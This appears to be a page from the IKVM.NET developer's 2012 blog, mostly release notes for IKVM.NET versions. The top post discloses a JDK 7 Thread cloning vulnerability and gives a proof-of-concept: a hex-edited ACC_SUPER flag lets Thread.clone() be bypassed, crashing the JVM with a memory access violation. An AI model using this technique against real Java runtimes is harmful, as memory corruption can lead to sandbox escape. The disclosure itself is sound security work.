# Thursday, 01 November 2012
JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored,so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() with a version that simply throws CloneNotSupportedException. The only problem is, in Java (and .NET too) overriding a method is not a safe way to make the base class method unavailable.

The (still) not so well known ACC_SUPER flag allows you (when it isn't set) to call arbitrary (accessible) methods in your super class hierarchy. So Thread.clone() can be skipped and Object.clone() can be called from any Thread subclass that doesn't have the ACC_SUPER flag set.

Here's an example:

class Clone extends Thread implements Cloneable {
  public Object clone() {
    try { return super.clone(); }
    catch (CloneNotSupportedException _) { throw new Error(); }
  }
}

class Demo {
  public static void main(String[] args) throws Throwable {
    Clone c1 = new Clone() {
      public void run() {
        for (;;) {
        }
      }
    };
    c1.start();
    Thread t = (Thread)c1.clone();
    c1.stop();
    c1.join();
    System.gc();
    t.stop();
  }
}

Note that after you compile this with JDK 6 you'll need to edit the Clone.class to clear the ACC_SUPER flag. Use a hex editor to replace 20 (hex) with 00 or download a copy here.

Now run it:

C:\j>\jdk1.7-b145\bin\java Demo
#
# A fatal error has been detected by the Java Runtime Environment:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x000000006cd5af54, pid=3708, t id=10460
#
# JRE version: 7.0-b145
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0-b15 mixed mode windows-amd64 compressed oops)
# Problematic frame:
# V [jvm.dll+0x1caf54]
#
# Failed to write core dump. Minidumps are not enabled by default on client versions of Windows
#
# An error report file with more information is saved as:
# C:\j\hs_err_pid3708.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.sun.com/bugreport/crash.jsp
#

Thursday, 01 November 2012 16:11:20 (W. Europe Standard Time, UTC+01:00)  #    Comments [9]
# Wednesday, 31 October 2012
IKVM.NET 7.2 Release Candidate 4

Yet another release candidate.

Changes (relative to rc 3):

  • Updated version to 7.2.4630.4
  • Added (optional) support for building without System.Core.dll dependency.
  • Bug fix. Generate override stubs for unsupported abstract generic methods. Fix for #3579785.
  • Bug fix. Handle incomplete interface mappings. Fix for bug #3581564.
  • Bug fix. Verifier should not merge state from instruction following exception block to handler. Fix for bug #3580611.

Binaries available here: ikvmbin-7.2.4630.4.zip

Sources: ikvmsrc-7.2.4630.4.zip, openjdk-7u6-b24-stripped.zip

Wednesday, 31 October 2012 13:50:31 (W. Europe Standard Time, UTC+01:00)  #    Comments [3]
# Tuesday, 23 October 2012
IKVM.NET 7.2 Release Candidate 3

The stream of release candidates seems to never end, but I really wanted to include the fix for bug #3575555. I also included some other low-risk fixes.

Changes (relative to rc 2):

  • Updated version to 7.2.4630.3
  • Bug fix. Off-by-one error in JNI local ref index reusing. Fix for bug #3575555.
  • Bug fix. Don't try to inject DynamicMethod in array types (applies to array.clone() method for MethodHandles).
  • IKVM.Reflection: Bug fix. ModuleReader.ResolveMember() should support types. Thanks to Jb Evain for finding this.
  • IKVM.Reflection: Bug fix. While reading the Mono.Cecil source I realized that array bounds are signed.
  • IKVM.Reflection: Bug fix. LocalBuilder should extend LocalVariableInfo.
  • IKVM.Reflection: Implemented LocalVariableInfo.ToString().

Binaries available here: ikvmbin-7.2.4630.3.zip

Sources: ikvmsrc-7.2.4630.3.zip, openjdk-7u6-b24-stripped.zip

Tuesday, 23 October 2012 10:24:01 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Monday, 08 October 2012
IKVM.NET 7.2 Release Candidate 2

More bug fixes.

Changes (relative to rc 1):

  • Updated version to 7.2.4630.2
  • Bug fix. Class.forName("") should not throw System.ArgumentException.
  • Bug fix. Transient field modifier should be retained on literal fields.
  • Bug fix. Field.getModifiers() should only return the relevant modifiers.
  • IKVM.Reflection: Bug fix. Ignore unknown metadata streams.
  • IKVM.Reflection: Bug fix. Set AddressOfRawData in IMAGE_DEBUG_DIRECTORY.

Binaries available here: ikvmbin-7.2.4630.2.zip

Sources: ikvmsrc-7.2.4630.2.zip, openjdk-7u6-b24-stripped.zip

Monday, 08 October 2012 09:48:54 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Wednesday, 03 October 2012
IKVM.NET 0.46 Update 2 Release Candidate 1

I forgot to include the fix for transient constant static final fields in the previous release candidate and a new bug was reported in how IKVM.Reflection writes the debug PE header that causes problems with Visual Studio 2012's code coverage tools.

Changes (relative to 0.46 Update 2 rc 0):

  • Updated version to 0.46.0.4.
  • Fixed ikvmc to retain transient modifier on constant static final fields.
  • Fixed Field.getModifiers() to only return the relevant modifiers.
  • Fixed IKVM.Reflection to set AddressOfRawData in IMAGE_DEBUG_DIRECTORY.

Binaries available here: ikvmbin-0.46.0.4.zip

Sources: ikvmsrc-0.46.0.4.zip, openjdk6-b22-stripped.zip

Wednesday, 03 October 2012 08:26:59 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Thursday, 27 September 2012
Bye Bye ConstructorBuilder

System.Reflection.Emit is a great .NET feature, especially if you consider that it shipped as part of .NET 1.0, but the design of System.Reflection.Emit leaves something to be desired.

One of the crazy features is ConstructorBuilder. On the System.Reflection side, ConstructorInfo isn't all that helpful, but it is not as actively harmful as ConstructorBuilder. The reason for this is that ConstructorInfo and MethodInfo both extend MethodBase, so most common APIs are available through MethodBase.

ConstructorBuilder and MethodBuilder share no common Builder base class (because they extend ConstructorInfo and MethodInfo), this causes a lot of code duplication and type testing/downcasting.

A long time ago I found out that you can mostly avoid ConstructorBuilder, since it is possible to use TypeBuilder.DefineMethod() to define constructors. Recently I finally got around to taking advantage of this and completely removing ConstructorBuiler from the IKVM.NET runtime and compiler.

The thing that pushed me over the edge was this experiment. In .NET 2.0 there is no ConstructorBuilder equivalent to MethodBuilder.CreateMethodBody(). So if I'm ever going to experiment with method level JIT it is nice to be able to use this more efficient method of installing the stub.

There is one problem with using MethodBuilder for constructors. If you define a custom attribute and want to apply that custom attribute while it is still unbaked, you need a ConstructorBuilder for the custom attribute constructor, because CustomAttributeBuilder requires it. Luckily, in dynamic mode IKVM doesn't need to do this and in static mode I use IKVM.Reflection so I added MethodInfo.__AsConstructorInfo() to wrap the MethodInfo in a ConstructorInfo.

I considered adding MethodInfo support to CustomAttributeBuilder, but that turned out to be much more complicated, so I went with the easy approach of reusing the existing wrapping strategy.

The result of this refactoring is the removal of a bunch of duplicate code and a lot of downcasting. It also saves a small bit of memory, because the ConstructorBuilder wrappers are not needed anymore.

Thursday, 27 September 2012 14:29:05 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Wednesday, 26 September 2012
IKVM.NET 0.46 Update 2 Release Candidate 0

The 0.46 version is the last version based on Java 6 and as mentioned previously would be supported longer than a typical release. Based on user feedback I decided to post an update that fixes a number of bugs that have been found since the previous release.

Changes (relative to 0.46 Update 1):

  • Updated version to 0.46.0.3.
  • Bug fix. java.lang.Package was not populated from manifest for ikvmc compiled assemblies.
  • Bug fix. When writing a direct ByteBuffer to a non-blocking socket and the write fails because there is no kernel buffer available, we should not advance the ByteBuffer position.
  • Bug fix. When adding certificates to virtual cacerts file make sure that the aliases are unique.
  • Bug fix. If a finally/fault handler contains reachable code before the handler's start index, the handler should branch to the handler start index.
  • Bug fix. After emitting a finally/fault handler block, we should emit the block leave stubs (even though you can't leave the block, they also emit the backward branch stubs).
  • Bug fix. If a Java class extends a remapped .NET type (cli.System.Object or cli.System.Exception), we should correctly report the base class.
  • Bug fix. If we encounter a jsr or ret instruction, we should throw a VerifyError (instead of NotImplementedException).
  • Bug fix. If an exception block ends with an astore, we need to propagate the local variable type after the astore to the exception handler.
  • Disable AppDomain.ProcessExit hook to run shutdown hooks when running on Mono to workaround https://bugzilla.xamarin.com/show_bug.cgi?id=5650
  • Bug fix. Custom attribute properties that don't have a public getter and setter should not be exposed as annotation properties.
  • Bug fix. Non-public property getter/setter methods should be ignored when we create properties to hide properties inherited from shadow types. This fixes a build break with .NET 4.5 beta which introduces a protected setter for Exception.HResult.
  • Bug fix. The $Method inner class for delegates should also be loadable for generic delegates. Thanks to Michael Bayne for reporting this.
  • Bug fix. When constructing a generic class loader we can't use GetWrapperFromType() on the type arguments, because they might refer to a subtype that is currently being loaded.
  • Replaced non-ascii character (micro) with ascii 'u' in Win32PrintService.java.
  • IKVM.Reflection: Bug fix. Resource Directory Entries must be sorted and names are case-insensitive.

Binaries available here: ikvmbin-0.46.0.3.zip

Sources: ikvmsrc-0.46.0.3.zip, openjdk6-b22-stripped.zip

Wednesday, 26 September 2012 08:16:30 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Monday, 17 September 2012
IKVM.NET 7.2 Release Candidate 1

The previous release candidate had a regression that caused custom attributes specified in the remap xml file not to be applied. This caused the build to fail on .NET 4.0.

Changes (relative to rc 0):

  • Updated version to 7.2.4630.1
  • Fixed build number in CommonAssemblyInfo.cs.in.
  • Fixed .NET 4.0 build issues.
  • Fixed map.xml custom attribute application regression.
  • Updated HOWTO.

Binaries available here: ikvmbin-7.2.4630.1.zip

Sources: ikvmsrc-7.2.4630.1.zip, openjdk-7u6-b24-stripped.zip

Monday, 17 September 2012 13:39:29 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Tuesday, 04 September 2012
IKVM.NET 7.2 Release Candidate 0

The first release candidate is available. Compared with the development snapshot some minor improvements to Object.getClass() and Class.getDeclaredField() instrinsics were made.

Changes (relative to IKVM.NET 7.1):

  • Integrated OpenJDK 7u6 b24.
  • Improved java.util.concurrent performance.
  • Removed org.omg.PortableInterceptor.UNKNOWN class, that is not part of [Open]JDK rt.jar.
  • Added ZipFile constructor that was added in Java 7.
  • Changed ikvmc to apply custom attribute annotations on annotation types to the corresponding custom attribute that is generated (and allow AttributeUsageAttribute to override the default AttributeUsageAttribute generated from the @Target annotation).
  • Added app.config files for executables to allow them to run on .NET 4.5 on Windows 8 without triggering the .NET 3.5 auto download.
  • Bug fixes.
  • Many IKVM.Reflection improvements.

Binaries available here: ikvmbin-7.2.4630.0.zip

Sources: ikvmsrc-7.2.4630.0.zip, openjdk-7u6-b24-stripped.zip

Tuesday, 04 September 2012 15:39:29 (W. Europe Daylight Time, UTC+02:00)  #    Comments [5]
# Friday, 31 August 2012
New Development Snapshot

I've integrated OpenJDK 7u6. The 7u7 security update is not included (as IKVM.NET is not suitable for running untrusted Java code anyway).

One divergence from 7u6 of note is that the new string hashing (used to protect against DoS attacks by intentionally causing hash collisions) has not been implemented. Instead the .NET String.GetHashCode() method is used for the alternative hash code. If DoS protection is required, .NET 4.5 should be used and randomized string hashing should be enabled.

Next stop the release candidate.

Changes:

  • Merged OpenJDK 7u6 b24.
  • Add support for running with headless awt toolkit. Fix for #3552089.
  • Fix a ClassCastException in printerJob.defaultPage() if the default paper format is not a standard paper format. This can occur with label printer.
  • Stop using ConstructorBuilder (always use MethodBuilder).
  • Remove usage of AssemblyName.ReferenceMatchesDefinition() because it is broken on .NET and not implemented on Mono.
  • Apply custom attribute annotations on annotation types to the corresponding custom attribute that is generated (and allow AttributeUsageAttribute to override the default AttributeUsageAttribute generated from the @Target annotation).
  • Fixed InternalsVisibleToAttribute handling to take the public key into account as well.
  • Win32 print service fixes.
  • Optimized String.valueOf(char).
  • Add app.config files for executables to allow them to run on .NET 4.5 on Windows 8 without triggering the .NET 3.5 auto download.
  • Fix Window.setIconImages(). Now all images are used. Before only the first image was used.
  • Disallow Unsafe.getUnsafe() from being called via reflection (for JDK compatibility).
  • Merged in security manager check to Font.createFont(int, File) from OpenJDK.
  • IKVM.Reflection: Bug fix. When enumerating virtual methods, we should only skip match actual base methods, not any method with the same signature.
  • IKVM.Reflection: Automatically add default constructor when necessary (using the same criteria as Ref.Emit).
  • IKVM.Reflection: Added API extension to wrap MethodInfo in a ConstructorInfo.

Binaries available here: ikvmbin-7.2.4626.zip

The stripped OpenJDK 7u6 b24 sources are available here: openjdk-7u6-b24-stripped.zip

Friday, 31 August 2012 13:43:50 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]